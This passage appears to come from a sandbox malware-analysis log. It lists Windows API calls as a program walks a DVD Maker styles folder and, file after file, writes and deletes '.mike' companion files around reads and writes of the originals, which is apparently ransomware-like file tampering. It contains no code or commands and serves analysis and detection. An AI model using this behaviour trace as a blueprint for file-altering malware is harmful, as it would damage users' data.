ftCreationTime.dwLowDateTime=0x71501adb, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x71501adb, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x5206f98f, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x673c74, dwReserved0=0x0, dwReserved1=0x0, cFileName="SportsNotesBackground_PAL.wmv", cAlternateFileName="")) returned 1 [0066.053] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x716a49da, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x716a49da, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x522f70cd, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x2ca474, dwReserved0=0x0, dwReserved1=0x0, cFileName="SportsScenesBackground.wmv", cAlternateFileName="")) returned 1 [0066.053] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71789208, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x71789208, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x524e6293, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x2e59f4, dwReserved0=0x0, dwReserved1=0x0, cFileName="SportsScenesBackground_PAL.wmv", cAlternateFileName="")) returned 1 [0066.053] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71384d39, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x71384d39, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ff68a0b, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x23d2, dwReserved0=0x0, dwReserved1=0x0, cFileName="sports_disc_mask.png", cAlternateFileName="")) returned 1 [0066.054] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71384d39, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x71384d39, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ff68a0b, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x23d2, dwReserved0=0x0, dwReserved1=0x0, cFileName="sports_disc_mask.png", cAlternateFileName="")) returned 0 [0066.054] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0066.054] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0066.054] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0066.054] CoTaskMemFree (pv=0x506980) [0066.054] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0066.054] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking", nBufferLength=0x105, lpBuffer=0x2aecdc, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking", lpFilePart=0x0) returned 0x34 [0066.054] FindFirstFileW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\*", lpFindFileData=0x2aeecc | out: lpFindFileData=0x2aeecc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa198102e, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa9057bb, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa19a729d, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0066.059] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa198102e, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa9057bb, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa19a729d, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0066.059] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f740a33, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f740a33, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x540920df, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x11da, dwReserved0=0x0, dwReserved1=0x0, cFileName="1047x576black.png", cAlternateFileName="")) returned 1 [0066.059] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f71a8d6, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f71a8d6, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x5396df3f, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x1928, dwReserved0=0x0, dwReserved1=0x0, cFileName="1047x576_91n92.png", cAlternateFileName="")) returned 1 [0066.060] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f6ce61c, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f6ce61c, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x544241af, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xb05, dwReserved0=0x0, dwReserved1=0x0, cFileName="15x15dot.png", cAlternateFileName="")) returned 1 [0066.060] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f740a33, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f740a33, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x5444a30d, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x15f4, dwReserved0=0x0, dwReserved1=0x0, cFileName="720x480icongraphic.png", cAlternateFileName="")) returned 1 [0066.060] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f6ce61c, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f6ce61c, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x5444a30d, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x143e, dwReserved0=0x0, dwReserved1=0x0, cFileName="720_480shadow.png", cAlternateFileName="")) returned 1 [0066.060] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f7ff104, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f7ff104, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x54613375, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NavigationLeft_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0066.060] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f7b2e4a, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f7b2e4a, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x54e68005, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc3a, dwReserved0=0x0, dwReserved1=0x0, cFileName="NavigationLeft_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0066.060] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f7d8fa7, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f7d8fa7, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x54f98af5, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13a1, dwReserved0=0x0, dwReserved1=0x0, cFileName="NavigationRight_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0066.060] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f78cced, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f78cced, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x5529264d, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc2e, dwReserved0=0x0, dwReserved1=0x0, cFileName="NavigationRight_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0066.061] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f766b90, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f766b90, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x5529264d, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x135b, dwReserved0=0x0, dwReserved1=0x0, cFileName="NavigationUp_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0066.061] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f7b2e4a, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f7b2e4a, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x552b87ab, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc09, dwReserved0=0x0, dwReserved1=0x0, cFileName="NavigationUp_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0066.061] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f6a84bf, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f6a84bf, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x552b87ab, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x60d7, dwReserved0=0x0, dwReserved1=0x0, cFileName="photograph.png", cAlternateFileName="")) returned 1 [0066.061] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0066.061] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0066.062] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\1047x576black.png", nBufferLength=0x105, lpBuffer=0x2aebe0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\1047x576black.png", lpFilePart=0x0) returned 0x46 [0066.068] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0066.068] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\1047x576black.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\1047x576black.png.mike", lpFilePart=0x0) returned 0x4b [0066.069] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\1047x576black.png", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\1047x576black.png", lpFilePart=0x0) returned 0x46 [0066.069] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\1047x576black.png.mike", nBufferLength=0x105, lpBuffer=0x2aebf8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\1047x576black.png.mike", lpFilePart=0x0) returned 0x4b [0066.069] WriteFile (in: hFile=0x288, lpBuffer=0x224ae80*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x224ae80*, lpNumberOfBytesWritten=0x2af074*=0x220, lpOverlapped=0x0) returned 1 [0066.070] CloseHandle (hObject=0x288) returned 1 [0066.070] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x0 [0066.070] ReadFile (in: hFile=0x288, lpBuffer=0x224bfb4, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x224bfb4*, lpNumberOfBytesRead=0x2af080*=0x11da, lpOverlapped=0x0) returned 1 [0066.072] CloseHandle (hObject=0x288) returned 1 [0066.072] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\1047x576black.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\1047x576black.png.mike", lpFilePart=0x0) returned 0x4b [0066.073] WriteFile (in: hFile=0x288, lpBuffer=0x2257bb8*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0a4, lpOverlapped=0x0 | out: lpBuffer=0x2257bb8*, lpNumberOfBytesWritten=0x2af0a4*=0x20c, lpOverlapped=0x0) returned 1 [0066.074] CloseHandle (hObject=0x288) returned 1 [0066.074] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\1047x576black.png", nBufferLength=0x105, lpBuffer=0x2aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\1047x576black.png", lpFilePart=0x0) returned 0x46 [0066.074] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\1047x576black.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\1047x576black.png.mike", lpFilePart=0x0) returned 0x4b [0066.074] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\1047x576black.png.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\1047x576black.png.mike", lpFilePart=0x0) returned 0x4b [0066.074] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\1047x576black.png", dwFileAttributes=0x80) returned 0 [0066.075] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\1047x576black.png", nBufferLength=0x105, lpBuffer=0x2aeba4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\1047x576black.png", lpFilePart=0x0) returned 0x46 [0066.075] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\1047x576black.png.mike", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\1047x576black.png.mike", lpFilePart=0x0) returned 0x4b [0066.075] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\1047x576black.png.mike", nBufferLength=0x105, lpBuffer=0x2aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\1047x576black.png.mike", lpFilePart=0x0) returned 0x4b [0066.075] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\1047x576black.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\stacking\\1047x576black.png.mike")) returned 1 [0066.076] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\1047x576_91n92.png", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\1047x576_91n92.png", lpFilePart=0x0) returned 0x47 [0066.076] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\1047x576_91n92.png", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\1047x576_91n92.png", lpFilePart=0x0) returned 0x47 [0066.076] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\1047x576_91n92.png", nBufferLength=0x105, lpBuffer=0x2aebe0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\1047x576_91n92.png", lpFilePart=0x0) returned 0x47 [0066.078] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0066.078] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\1047x576_91n92.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\1047x576_91n92.png.mike", lpFilePart=0x0) returned 0x4c [0066.078] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\1047x576_91n92.png", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\1047x576_91n92.png", lpFilePart=0x0) returned 0x47 [0066.078] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\1047x576_91n92.png.mike", nBufferLength=0x105, lpBuffer=0x2aebf8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\1047x576_91n92.png.mike", lpFilePart=0x0) returned 0x4c [0066.079] WriteFile (in: hFile=0x288, lpBuffer=0x225cc28*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x225cc28*, lpNumberOfBytesWritten=0x2af074*=0x220, lpOverlapped=0x0) returned 1 [0066.080] CloseHandle (hObject=0x288) returned 1 [0066.080] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x0 [0066.080] ReadFile (in: hFile=0x288, lpBuffer=0x225dd60, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x225dd60*, lpNumberOfBytesRead=0x2af080*=0x1928, lpOverlapped=0x0) returned 1 [0066.091] CloseHandle (hObject=0x288) returned 1 [0066.092] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\1047x576_91n92.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\1047x576_91n92.png.mike", lpFilePart=0x0) returned 0x4c [0066.099] WriteFile (in: hFile=0x288, lpBuffer=0x226c548*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0a4, lpOverlapped=0x0 | out: lpBuffer=0x226c548*, lpNumberOfBytesWritten=0x2af0a4*=0x20c, lpOverlapped=0x0) returned 1 [0066.099] CloseHandle (hObject=0x288) returned 1 [0066.099] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\1047x576_91n92.png", nBufferLength=0x105, lpBuffer=0x2aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\1047x576_91n92.png", lpFilePart=0x0) returned 0x47 [0066.099] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\1047x576_91n92.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\1047x576_91n92.png.mike", lpFilePart=0x0) returned 0x4c [0066.099] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\1047x576_91n92.png.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\1047x576_91n92.png.mike", lpFilePart=0x0) returned 0x4c [0066.100] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\1047x576_91n92.png", dwFileAttributes=0x80) returned 0 [0066.101] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\1047x576_91n92.png", nBufferLength=0x105, lpBuffer=0x2aeba4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\1047x576_91n92.png", lpFilePart=0x0) returned 0x47 [0066.102] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\1047x576_91n92.png.mike", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\1047x576_91n92.png.mike", lpFilePart=0x0) returned 0x4c [0066.102] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\1047x576_91n92.png.mike", nBufferLength=0x105, lpBuffer=0x2aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\1047x576_91n92.png.mike", lpFilePart=0x0) returned 0x4c [0066.102] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\1047x576_91n92.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\stacking\\1047x576_91n92.png.mike")) returned 1 [0066.103] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\15x15dot.png", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\15x15dot.png", lpFilePart=0x0) returned 0x41 [0066.103] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\15x15dot.png", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\15x15dot.png", lpFilePart=0x0) returned 0x41 [0066.103] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\15x15dot.png", nBufferLength=0x105, lpBuffer=0x2aebe0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\15x15dot.png", lpFilePart=0x0) returned 0x41 [0066.104] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0066.105] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\15x15dot.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\15x15dot.png.mike", lpFilePart=0x0) returned 0x46 [0066.105] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\15x15dot.png", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\15x15dot.png", lpFilePart=0x0) returned 0x41 [0066.105] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\15x15dot.png.mike", nBufferLength=0x105, lpBuffer=0x2aebf8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\15x15dot.png.mike", lpFilePart=0x0) returned 0x46 [0066.105] WriteFile (in: hFile=0x288, lpBuffer=0x2271470*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x2271470*, lpNumberOfBytesWritten=0x2af074*=0x220, lpOverlapped=0x0) returned 1 [0066.106] CloseHandle (hObject=0x288) returned 1 [0066.106] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x0 [0066.107] ReadFile (in: hFile=0x288, lpBuffer=0x2272590, nNumberOfBytesToRead=0x2800, 